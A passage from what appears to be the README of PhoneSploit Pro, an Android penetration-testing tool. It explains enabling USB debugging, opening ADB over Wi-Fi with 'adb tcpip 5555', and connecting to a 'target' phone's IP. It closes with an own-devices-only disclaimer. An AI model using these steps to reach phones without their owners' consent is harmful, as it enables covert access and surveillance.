or Follow this link : Click Here

or Visit this link : Click Here

On Windows :

Visit this link : Click Here

or Follow this link : Click Here

Installing scrcpy

Visit the scrcpy GitHub page for latest installation instructions : Click Here

On Windows : Copy all the files from the extracted scrcpy folder to PhoneSploit-Pro folder.

If scrcpy is not available for your Linux distro, then you can build it with a few simple steps : Build Guide

Tutorial

Setting up Android Phone for the first time

• Enabling the Developer Options

1. Open Settings.
2. Go to About Phone.
3. Find Build Number.
4. Tap on Build Number 7 times.
5. Enter your pattern, PIN or password to enable the Developer options menu.
6. The Developer options menu will now appear in your Settings menu.

• Enabling USB Debugging

1. Open Settings.
2. Go to System > Developer options.
3. Scroll down and Enable USB debugging.

• Connecting with Computer

1. Connect your Android device and adb host computer to a common Wi-Fi network.
2. Connect the device to the host computer with a USB cable.
3. Open terminal in the computer and enter the following command :

adb devices

4. A pop-up will appear in the Android phone when you connect your phone to a new PC for the first time : Allow USB debugging?.
5. Click on Always allow from this computer check-box and then click Allow.
6. Then enter the following command :

adb tcpip 5555

7. Now you can connect the Android Phone over Wi-Fi.
8. Disconnect the USB cable.
9. Go to Settings > About Phone > Status > IP address and note the phone's IP Address.
10. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

Connecting the Android phone for the next time

1. Connect your Android device and host computer to a common Wi-Fi network.
2. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

This tool is tested on

• ✅Ubuntu
• ✅Linux Mint
• ✅Kali Linux
• ✅Fedora
• ✅Arch Linux
• ✅Parrot Security OS
• ✅Windows 11
• ✅Termux (Android)

All the new features are primarily tested on Linux, thus Linux is recommended for running PhoneSploit Pro. Some features might not work properly on Windows.

Disclaimer

• Neither the project nor its developer promote any kind of illegal activity and are not responsible for any misuse or damage caused by this project.
• This project is for the purpose of penetration testing only.
• Please do not use this tool on other people's devices without their permission.
• Do not use this tool to harm others.
• Use this project responsibly on your own devices only.
• It is the end user's responsibility to obey all applicable local, state, federal, and international laws.